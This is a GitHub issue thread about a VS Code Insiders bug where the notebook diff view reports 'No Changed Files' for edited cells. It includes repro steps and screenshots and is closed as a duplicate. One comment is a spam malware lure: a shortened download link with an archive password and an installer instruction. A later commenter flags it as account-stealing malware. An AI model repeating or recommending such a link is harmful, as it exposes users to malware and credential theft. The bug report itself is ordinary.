### ISSUE TITLE
`No Changed Files` in notebook diff view

### ISSUE THREAD

**Issue by bamurtaugh** [microsoft/vscode#226789]
Testing #226665

Testing on latest VS Code Insiders on Windows 11 Insiders

Version: 1.93.0-insider (user setup)
Commit: ff7a154d5e5e9034914f0466420f0f1407f0c95e
Date: 2024-08-27T05:04:20.235Z
Electron: 30.4.0
ElectronBuildId: 10073054
Chromium: 124.0.6367.243
Node.js: 20.15.1
V8: 12.4.254.20-electron.0
OS: Windows_NT x64 10.0.25987

- Create notebook, add some cells, save new notebook to GH repo
![Image](https://github.com/user-attachments/assets/01272327-d6d7-485d-829e-b5f3b18871bb)
- Stage changes to repo with new notebook
- Add `y=91000000` to final cell:
![Image](https://github.com/user-attachments/assets/733b9592-8b36-4d5b-9cb5-2a51d2478745)
- ✅ See notebook listed in `Changes` in SCM view:
![Image](https://github.com/user-attachments/assets/b8cd43aa-7362-4893-a6f2-84d17828579c)
- ❓ When I open the diff, I'm told `No Changed Files`:
![Image](https://github.com/user-attachments/assets/aa5724a1-fabd-426d-9d14-aeb79938d463)
- If I `Open Text Diff Editor`, I do see a diff:
![Image](https://github.com/user-attachments/assets/cae78ce9-d858-408b-840e-6b6d782a0774)

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by caineblood** [comment]
The above comment asking you to download a file is malware to steal your account; do not under any circumstances download or run it. The post needs to be removed. If you have attempted to run it please have your system cleaned and your account secured immediately.

**Comment by bamurtaugh** [comment]
I'm able to repro if I just change the content of a code cell again. I updated x's value in this cell, but the diff view doesn't show it:

![Image](https://github.com/user-attachments/assets/c715c3fd-6517-48ff-9616-094b47003cf6)

![Image](https://github.com/user-attachments/assets/e63e97bb-42e6-45bd-abc4-517088bd00b1)

**Comment by DonJayamanne** [comment]
Duplicatre of https://github.com/microsoft/vscode/issues/226807
